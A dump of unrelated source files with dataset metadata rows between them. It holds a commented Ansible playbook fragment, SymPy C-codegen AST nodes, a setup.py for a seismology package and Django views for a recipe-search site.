# l["name"] += "3"
# else:
# l["name"] += "2"
# elif l["name"] == "java":
# if "7" in l["version"]:
# l["name"] = "openjdk-7-jdk"
# elif "8" in l["version"]:
# l["name"] = "openjdk-8-jdk"
# else:
# l["name"] = "openjdk-6-jdk"
#
# ctasks.append({
# "name": "install {} (for app {})".format(l["name"], str(a)),
# "apt": {"pkg": "{}={}*".format(l["name"], l["version"])}})
# playbook.append({"hosts": c[0], "tasks": ctasks})
#
# # A valid JSON-document is also valid YAML, so we can take a small shortcut here
# with open(os.path.join(t, "a-playbook.yml"), "w") as ah:
# json.dump(playbook, ah, indent=2)
# print(playbook)
# util.spawn_logged(["ansibleEnvironment/bin/ansible-playbook", "-v", "-i", os.path.join(t, "ansible-hosts"), os.path.join(t, "a-playbook.yml")])
#===============================================================================
|
epl-1.0
| -2,557,839,773,706,332,700 | 41.323232 | 153 | 0.540692 | false | 3.703049 | true | false | false |
wxgeo/geophar
|
wxgeometrie/sympy/codegen/cnodes.py
|
3
|
2498
|
"""
AST nodes specific to the C family of languages
"""
from sympy.core.basic import Basic
from sympy.core.compatibility import string_types
from sympy.core.containers import Tuple
from sympy.core.sympify import sympify
from sympy.codegen.ast import Attribute, Declaration, Node, String, Token, Type, none, FunctionCall
void = Type('void')
restrict = Attribute('restrict') # guarantees no pointer aliasing
volatile = Attribute('volatile')
static = Attribute('static')
def alignof(arg):
""" Generate of FunctionCall instance for calling 'alignof' """
return FunctionCall('alignof', [String(arg) if isinstance(arg, string_types) else arg])
def sizeof(arg):
""" Generate of FunctionCall instance for calling 'sizeof'
Examples
========
>>> from sympy.codegen.ast import real
>>> from sympy.codegen.cnodes import sizeof
>>> from sympy.printing.ccode import ccode
>>> ccode(sizeof(real))
'sizeof(double)'
"""
return FunctionCall('sizeof', [String(arg) if isinstance(arg, string_types) else arg])
class CommaOperator(Basic):
""" Represents the comma operator in C """
def __new__(cls, *args):
return Basic.__new__(cls, *[sympify(arg) for arg in args])
class Label(String):
""" Label for use with e.g. goto statement.
Examples
========
>>> from sympy.codegen.cnodes import Label
>>> from sympy.printing.ccode import ccode
>>> print(ccode(Label('foo')))
foo:
"""
class goto(Token):
""" Represents goto in C """
__slots__ = ['label']
_construct_label = Label
class PreDecrement(Basic):
""" Represents the pre-decrement operator
Examples
========
>>> from sympy.abc import x
>>> from sympy.codegen.cnodes import PreDecrement
>>> from sympy.printing.ccode import ccode
>>> ccode(PreDecrement(x))
'--(x)'
"""
nargs = 1
class PostDecrement(Basic):
""" Represents the post-decrement operator """
nargs = 1
class PreIncrement(Basic):
""" Represents the pre-increment operator """
nargs = 1
class PostIncrement(Basic):
""" Represents the post-increment operator """
nargs = 1
class struct(Node):
""" Represents a struct in C """
__slots__ = ['name', 'declarations']
defaults = {'name': none}
_construct_name = String
@classmethod
def _construct_declarations(cls, args):
return Tuple(*[Declaration(arg) for arg in args])
class union(struct):
""" Represents a union in C """
|
gpl-2.0
| 1,761,598,395,251,997,700 | 22.566038 | 99 | 0.651321 | false | 3.915361 | false | false | false |
ezietsman/seismo
|
setup.py
|
1
|
1041
|
from numpy.distutils.core import Extension
f90periodogram = Extension(name='f90periodogram',
sources=['seismo/src/periodogram.f90'],
extra_f90_compile_args=["-fopenmp", "-lgomp"],
extra_link_args=["-lgomp"])
if __name__ == "__main__":
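    # Build the Fortran extension with numpy.distutils first, then register the pure-Python package with setuptools.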
from numpy.distutils.core import setup
setup(name='seismo_blobs',
description="Compiled sources for use with seismo",
author="Ewald Zietsman",
author_email="[email protected]",
ext_modules=[f90periodogram]
)
# Now seismo
import setuptools
setuptools.setup(
name="seismo",
version="0.2",
packages=setuptools.find_packages(),
install_requires=['numpy>=1.9'],
# metadata for upload to PyPI
author="Ewald Zietsman",
author_email="[email protected]",
description="Timeseries stuff for asteroseismology",
license="MIT",
keywords="time series frequency",
)
|
mit
| 5,087,803,322,496,857,000 | 29.617647 | 73 | 0.580211 | false | 3.898876 | false | false | false |
Anushi/inhousemenu
|
search_recipes/views.py
|
1
|
14147
|
import operator
from django.shortcuts import render
from django.http import HttpResponse
from .models import RecipeList, RecipeIngredient, RecipeContent2, IngredientList
from django.db.models import Q
import itertools
# Create your views here.
def search_recipes_form(request):
ingredients_name_list = IngredientList.objects.all()
#print ingredients_name_list
for i in ingredients_name_list:
print i.ingredient_name
return render(request, 'search_form.html',
{'ingredients_name_list': ingredients_name_list
})
def search_recipes(request):
search_list = []
search_list_temp = []
checks_list = []
split_q_nonull = []
split_q_nonull2 = []
delete_list = []
other_list = []
q2=""
ingredients_name_list = IngredientList.objects.all()
if request.method == 'GET':
if request.GET.getlist('checks[]'):
checks_list = request.GET.getlist('checks[]')
search_list_temp.extend(checks_list)
if request.GET.getlist('other'):
other_list = request.GET.getlist('other')
search_list_temp.extend(other_list)
print "====== other_list ======"
print other_list
if request.GET.getlist('add'):
add_list = request.GET.getlist('add')
search_list_temp.extend(add_list)
print "====== add_list ======"
print add_list
"""if 'q' in request.GET:
q = request.GET['q']
q_encode=q.encode('utf8')
split_q = q_encode.split(",")
split_q_nonull = [x for x in split_q if x]
search_list_temp.extend(split_q_nonull)
print "====== Q ======"
print q"""
if 'q2' in request.GET:
q2 = request.GET['q2']
q_encode2=q2.encode('utf8')
split_q2 = q_encode2.split(",")
split_q_nonull2 = [x for x in split_q2 if x]
search_list_temp.extend(split_q_nonull2)
print "**** Q2 ****"
print q2
if 'delete' in request.GET:
delete_list = request.GET.getlist('delete')
print "-- DEL LIST --"
print delete_list
#for d in delete_list:
# search_list.remove(d)
for s in search_list_temp:
search_list.append(s.lower())
print "-- search_list -- "
print search_list
recipe_ingredients_table = RecipeIngredient.objects.filter(reduce(lambda x, y: x | y, [Q(ingredient__contains=word) for word in search_list]))
recipe_list = []
for r in recipe_ingredients_table:
recipe_list.append(r.recipe_name)
recipe_list_unique = list(set(recipe_list))
recipe_name_table = RecipeList.objects.filter(reduce(lambda x, y: x | y, [Q(recipe_name__iexact=word) for word in recipe_list_unique]))
######### RANKING RECIPES ######################
recipe_content = RecipeContent2.objects.filter(reduce(lambda x, y: x | y, [Q(recipe_name__iexact=word) for word in recipe_list_unique]))
search_set = set(search_list)
print " == SEARCH SET =="
print search_set
s_len = len(search_set)
rank_dic = {}
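    # Rank recipes by how many of the searched ingredients appear together in their content: larger matching subsets win.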
#for i in xrange(s_len, 0, -1):
for i in range(1, s_len+1):
subsets = set(itertools.combinations(search_set, i))
for x in subsets:
recipe_content_rankwise = recipe_content.filter(reduce(lambda x, y: x | y, [Q(content__contains=word) for word in x]))
qs = recipe_content.filter(reduce(operator.and_, (Q(content__contains=word) for word in x)))
for temp in qs:
rank_dic[temp.recipe_name] = i
#print "--- RANK DICTIONARY --"
sorted_rank_dic = sorted(rank_dic.items(), key=operator.itemgetter(1), reverse=True)
#print sorted_rank_dic
######### END RANKING RECIPES ######################
##########################################################
# Meal type - main, entree, soups, desserts, congee, etc
recipe_name_mealtype_table = []
meal_type = []
meal_type_list = []
if request.GET.getlist('meal_type'):
meal_type = request.GET.getlist('meal_type')
if meal_type[0] == "Desserts":
meal_type_list.append("dessert")
elif meal_type[0] == "Soups":
meal_type_list.append("soup")
elif meal_type[0] == "Congee":
meal_type_list.append("congee")
elif meal_type[0] == "Entree + Main":
meal_type_list.append("entree")
meal_type_list.append("main")
elif meal_type[0] == "All":
meal_type_list.append("entree")
meal_type_list.append("soup")
meal_type_list.append("congee")
meal_type_list.append("main")
meal_type_list.append("dessert")
meal_type_list.append("")
#recipe_name_mealtype_table = recipe_name_table.filter(reduce(lambda x, y: x | y, [Q(category__iexact=word) for word in meal_type_list]))
else:
meal_type_list.append("entree")
meal_type_list.append("soup")
meal_type_list.append("congee")
meal_type_list.append("main")
meal_type_list.append("dessert")
meal_type_list.append("")
recipe_name_mealtype_table = recipe_name_table.filter(reduce(lambda x, y: x | y, [Q(category__iexact=word) for word in meal_type_list]))
##########################################################
# Cuisine type - Australian, Chinese, Indian, etc
recipe_name_cuisinetype_table = []
cuisine_type = []
cuisine_type_list = []
if request.GET.getlist('cuisine_type'):
cuisine_type = request.GET.getlist('cuisine_type')
if cuisine_type[0] == "Australian":
cuisine_type_list.append("Australian")
elif cuisine_type[0] == "Chinese":
cuisine_type_list.append("Chinese")
elif cuisine_type[0] == "Indian":
cuisine_type_list.append("Indian")
elif cuisine_type[0] == "All":
cuisine_type_list.append("Australian")
cuisine_type_list.append("Chinese")
cuisine_type_list.append("Indian")
#recipe_name_cuisinetype_table = recipe_name_mealtype_table.filter(reduce(lambda x, y: x | y, [Q(recipe_type__iexact=word) for word in cuisine_type_list]))
else:
cuisine_type_list.append("Australian")
cuisine_type_list.append("Chinese")
cuisine_type_list.append("Indian")
recipe_name_cuisinetype_table = recipe_name_mealtype_table.filter(reduce(lambda x, y: x | y, [Q(recipe_type__iexact=word) for word in cuisine_type_list]))
# Flavour type - Mixed, Spicy & Flavor, Thick & Creamy etc
recipe_name_tastetype_table = []
taste_type = []
taste_type_list = []
if request.GET.getlist('taste[]'):
taste_type = request.GET.getlist('taste[]')
print "*********"
print taste_type
if "spicy&hot" in taste_type:
taste_type_list.append("spicy&hot")
elif "thick&creamy" in taste_type:
taste_type_list.append("thick&creamy")
elif "light&refresh" in taste_type:
taste_type_list.append("light&refresh")
elif "crispy&crunchy" in taste_type:
taste_type_list.append("crispy&crunchy")
elif "mixed" in taste_type:
taste_type_list.append("spicy&hot")
taste_type_list.append("thick&creamy")
taste_type_list.append("light&refresh")
taste_type_list.append("")
recipe_name_tastetype_table = recipe_name_cuisinetype_table.filter(reduce(lambda x, y: x | y, [Q(taste__iexact=word) for word in taste_type_list]))
#CATEGORY
main_recipes_table = recipe_name_tastetype_table.filter(category__iexact="main")
entree_recipes_table = recipe_name_tastetype_table.filter(category__iexact="entree")
dessert_recipes_table = recipe_name_tastetype_table.filter(category__iexact="dessert")
soup_recipes_table = recipe_name_tastetype_table.filter(category__iexact="soup")
congee_recipes_table = recipe_name_tastetype_table.filter(category__iexact="congee")
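    # Split the ranked recipes by category so the template can show separate main/entree/dessert/soup/congee sections.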
main_rank_dictionary = {}
for m in main_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
main_rank_dictionary[recp] = rank_dic[recp]
sorted_main_rank_dic = sorted(main_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
entree_rank_dictionary = {}
for m in entree_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
entree_rank_dictionary[recp] = rank_dic[recp]
sorted_entree_rank_dic = sorted(entree_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
dessert_rank_dictionary = {}
for m in dessert_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
dessert_rank_dictionary[recp] = rank_dic[recp]
sorted_dessert_rank_dic = sorted(dessert_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
soup_rank_dictionary = {}
for m in soup_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
soup_rank_dictionary[recp] = rank_dic[recp]
sorted_soup_rank_dic = sorted(soup_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
congee_rank_dictionary = {}
for m in congee_recipes_table:
recp = m.recipe_name
if(recp in rank_dic.keys()):
congee_rank_dictionary[recp] = rank_dic[recp]
sorted_congee_rank_dic = sorted(congee_rank_dictionary.items(), key=operator.itemgetter(1), reverse=True)
return render(request, 'search_results.html',
{'ingredients_name_list': ingredients_name_list,
'checks_list': checks_list,
'recipe_name_table': recipe_name_table,
'recipe_name_tastetype_table': recipe_name_tastetype_table,
'meal_type': meal_type,
'cuisine_type': cuisine_type,
'taste_type': taste_type,
'q2': q2,
'search_set':search_set,
'delete_list':delete_list,
'other_list':other_list,
'sorted_main_rank_dic':sorted_main_rank_dic,
'sorted_entree_rank_dic':sorted_entree_rank_dic,
'sorted_dessert_rank_dic':sorted_dessert_rank_dic,
'sorted_soup_rank_dic':sorted_soup_rank_dic,
'sorted_congee_rank_dic':sorted_congee_rank_dic
})
#message = 'Hello Anushi'
#return HttpResponse(message)
def search_recipes_copy(request):
#if 'q' in request.GET:
# message = 'You searched for: %r' % request.GET['q']
#else:
# message = 'You submitted an empty form.'
#return HttpResponse(message)
request_temp = request
message = "Hello"
if request.method == 'GET':
message = 'Welcome'
search_list = []
taste_search_list = []
checks_list = []
if request.GET.getlist('checks[]'):
checks_list = request.GET.getlist('checks[]')
search_list.extend(checks_list)
print "#############################"
print checks_list
if request.GET['q']:
q = request.GET['q']
q_encode=q.encode('utf8')
split_q = q_encode.split(",")
split_q_nonull = [x for x in split_q if x]
search_list.extend(split_q_nonull)
if request.GET.getlist('taste[]'):
print "**** TASTE *****"
taste_list = request.GET.getlist('taste[]')
taste_search_list.extend(taste_list)
if "" in taste_search_list:
if 'spicy&hot' not in taste_search_list:
taste_search_list.append('spicy&hot')
if 'thick&creamy' not in taste_search_list:
taste_search_list.append('thick&creamy')
if 'light&refresh' not in taste_search_list:
taste_search_list.append('light&refresh')
if 'crispy&crunchy' not in taste_search_list:
taste_search_list.append('crispy&crunchy')
print taste_search_list
print "---------------------------"
recipe_ingredients_table = RecipeIngredient.objects.filter(reduce(lambda x, y: x | y, [Q(ingredient__contains=word) for word in search_list]))
recipe_list = []
for r in recipe_ingredients_table:
recipe_list.append(r.recipe_name)
recipe_list_unique = list(set(recipe_list))
recipe_name_table = RecipeList.objects.filter(reduce(lambda x, y: x | y, [Q(recipe_name__iexact=word) for word in recipe_list_unique]))
#TASTE
recipe_name_taste_table = recipe_name_table.filter(reduce(lambda x, y: x | y, [Q(taste__iexact=word) for word in taste_search_list]))
#CATEGORY
main_recipes_table = recipe_name_taste_table.filter(category__iexact="main")
entree_recipes_table = recipe_name_taste_table.filter(category__iexact="entree")
return render(request, 'search_results.html',
{'main_recipes_table': main_recipes_table, 'entree_recipes_table': entree_recipes_table,'query': search_list, 'request_temp': request_temp, 'checks_list': checks_list})
def get_full_recipe(request,recipe_name_arg):
recipe_name_list = RecipeList.objects.filter(recipe_name=recipe_name_arg)
recipe_ingredients_list = RecipeIngredient.objects.filter(recipe_name=recipe_name_arg)
recipe_content = RecipeContent2.objects.filter(recipe_name=recipe_name_arg)
#html = "<html><body>Recipe is : %s </body></html>" % recipe_name
#return HttpResponse(html)
return render(request, 'get_full_recipe.html', {'recipe_name_list': recipe_name_list,'recipe_ingredients_list' : recipe_ingredients_list, 'recipe_content': recipe_content})
|
mit
| -8,943,540,473,010,711,000 | 35.37018 | 180 | 0.581466 | false | 3.417975 | false | false | false |